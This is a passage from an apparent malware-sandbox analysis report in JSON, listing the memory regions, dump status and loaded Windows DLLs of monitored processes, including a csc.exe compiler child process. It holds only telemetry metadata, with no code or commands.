8791798382592, "timestamp": "00:00:41.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000502-addr_0x000007ff00100000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799103488, "type": "region", "version": 1 }, "end_va": 8791799169023, "entry_point": 0, "filename": null, "id": "region_502", "name": "private_0x000007ff00100000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799103488, "timestamp": "00:00:41.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000503-addr_0x000007ff00110000-size_0x0000000000070000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799169024, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x000007ff00110000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799169024, "timestamp": "00:00:41.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000504-addr_0x000007fffff6c000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092416000, "type": 
"region", "version": 1 }, "end_va": 8796092424191, "entry_point": 0, "filename": null, "id": "region_504", "name": "private_0x000007fffff6c000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092416000, "timestamp": "00:00:41.600", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000505-addr_0x000007fffff6e000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092424192, "type": "region", "version": 1 }, "end_va": 8796092432383, "entry_point": 0, "filename": null, "id": "region_505", "name": "private_0x000007fffff6e000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092424192, "timestamp": "00:00:41.600", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000506-addr_0x000007fffff70000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092432384, "type": "region", "version": 1 }, "end_va": 8796092440575, "entry_point": 0, "filename": null, "id": "region_506", "name": "private_0x000007fffff70000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092432384, "timestamp": "00:00:41.601", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000509-addr_0x000007ffffec0000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": { "ref_id": "proc_dump_76", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796091711488, "type": "region", "version": 1 }, "end_va": 8796091777023, "entry_point": 0, "filename": null, "id": "region_509", "name": "private_0x000007ffffec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091711488, "timestamp": "00:00:42.077", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000510-addr_0x000007ffffed0000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_77", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796091777024, "type": "region", "version": 1 }, "end_va": 8796092366847, "entry_point": 0, "filename": null, "id": "region_510", "name": "private_0x000007ffffed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091777024, "timestamp": "00:00:42.078", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000511-addr_0x0000000002fa0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_78", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 50003967, "entry_point": 0, "filename": null, "id": "region_511", "name": "private_0x0000000002fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49938432, "timestamp": "00:00:42.721", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000001-region_00000517-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_79", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799627776, "type": "region", "version": 1 }, "end_va": 8791799693311, "entry_point": 0, "filename": null, "id": "region_517", "name": "private_0x000007ff00180000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799627776, "timestamp": "00:00:43.053", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000523-addr_0x00000000230b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_80", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 587923456, "type": "region", "version": 1 }, "end_va": 588972031, "entry_point": 0, "filename": null, "id": "region_523", "name": "private_0x00000000230b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 587923456, "timestamp": "00:00:43.438", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000525-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799693312, "type": "region", "version": 1 }, "end_va": 8791799758847, "entry_point": 0, "filename": null, "id": "region_525", "name": 
"private_0x000007ff00190000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799693312, "timestamp": "00:00:43.446", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000526-addr_0x000007fffff6a000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_82", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092407808, "type": "region", "version": 1 }, "end_va": 8796092415999, "entry_point": 0, "filename": null, "id": "region_526", "name": "private_0x000007fffff6a000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092407808, "timestamp": "00:00:43.449", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000533-addr_0x00000000231b0000-size_0x0000000000270000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_83", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2555904, "start_va": 588972032, "type": "region", "version": 1 }, "end_va": 591527935, "entry_point": 0, "filename": null, "id": "region_533", "name": "private_0x00000000231b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 588972032, "timestamp": "00:00:44.290", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000540-addr_0x000007fffff68000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_84", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092399616, "type": "region", "version": 1 }, "end_va": 8796092407807, 
"entry_point": 0, "filename": null, "id": "region_540", "name": "private_0x000007fffff68000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092399616, "timestamp": "00:00:44.524", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000548-addr_0x000007fffff66000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_85", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092391424, "type": "region", "version": 1 }, "end_va": 8796092399615, "entry_point": 0, "filename": null, "id": "region_548", "name": "private_0x000007fffff66000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092391424, "timestamp": "00:00:55.808", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000549-addr_0x0000000023740000-size_0x0000000000210000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_86", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2162688, "start_va": 594804736, "type": "region", "version": 1 }, "end_va": 596967423, "entry_point": 0, "filename": null, "id": "region_549", "name": "private_0x0000000023740000", "norm_filename": null, "region_type": "private_memory", "start_va": 594804736, "timestamp": "00:00:55.812", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000554-addr_0x00000000233a0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_87", "ref_source": "summary", "ref_type": 
"process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 591003648, "type": "region", "version": 1 }, "end_va": 591527935, "entry_point": 0, "filename": null, "id": "region_554", "name": "private_0x00000000233a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 591003648, "timestamp": "00:00:59.335", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\91rxrejg.cmdline\"", "filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe", "id": "proc_2", "image_name": "csc.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000557-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_88", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_557", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:00.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000558-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_89", "ref_source": "summary", "ref_type": 
"process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_558", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:00.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4296703, "entry_point": 4194304, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe", "id": "region_559", "name": "csc.exe", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\csc.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:01:00.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_560", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:00.171", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_561", "name": 
"private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:00.172", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000562-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_90", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_562", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:00.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_563", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:00.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_564", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": 
"00:01:00.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000565-addr_0x000007fffffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_91", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_565", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:00.176", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000566-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_92", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_566", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:00.177", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_567", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:00.195", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_568", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:01:00.195", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000569-addr_0x0000000000150000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_93", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1384447, "entry_point": 0, "filename": null, "id": "region_569", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:00.195", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000570-addr_0x0000000000260000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_94", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_570", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:01:00.196", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000002-region_00000571-addr_0x0000000000420000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_95", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_571", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:00.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_572", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:00.196", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_573", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:00.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are 
disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_574", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:00.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_575", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:00.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1863679, "entry_point": 1441792, "filename": "\\Windows\\System32\\locale.nls", "id": "region_576", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:00.258", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_577", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": 
"pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_578", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_579", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_580", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:00.259", "type": "region", "version": 1 }, { "dump": { "filename": 
"", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_581", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:00.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_582", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:00.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_583", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:00.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": 
"region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_584", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:00.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2002944, "start_va": 22414360576, "type": "region", "version": 1 }, "end_va": 22416363519, "entry_point": 22414360576, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cscomp.dll", "id": "region_585", "name": "cscomp.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cscomp.dll", "region_type": "memory_mapped_file", "start_va": 22414360576, "timestamp": "00:01:00.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_586", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:00.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1216512, "start_va": 8791622287360, "type": "region", "version": 1 }, "end_va": 8791623503871, "entry_point": 8791622425960, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll", 
"id": "region_587", "name": "c2r64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll", "region_type": "memory_mapped_file", "start_va": 8791622287360, "timestamp": "00:01:00.269", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 8791623532544, "type": "region", "version": 1 }, "end_va": 8791624032255, "entry_point": 8791623675456, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll", "id": "region_588", "name": "appvisvstream64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll", "region_type": "memory_mapped_file", "start_va": 8791623532544, "timestamp": "00:01:00.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2318336, "start_va": 8791624056832, "type": "region", "version": 1 }, "end_va": 8791626375167, "entry_point": 8791625165084, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll", "id": "region_589", "name": "appvisvsubsystems64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll", "region_type": "memory_mapped_file", "start_va": 8791624056832, "timestamp": "00:01:00.270", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, 
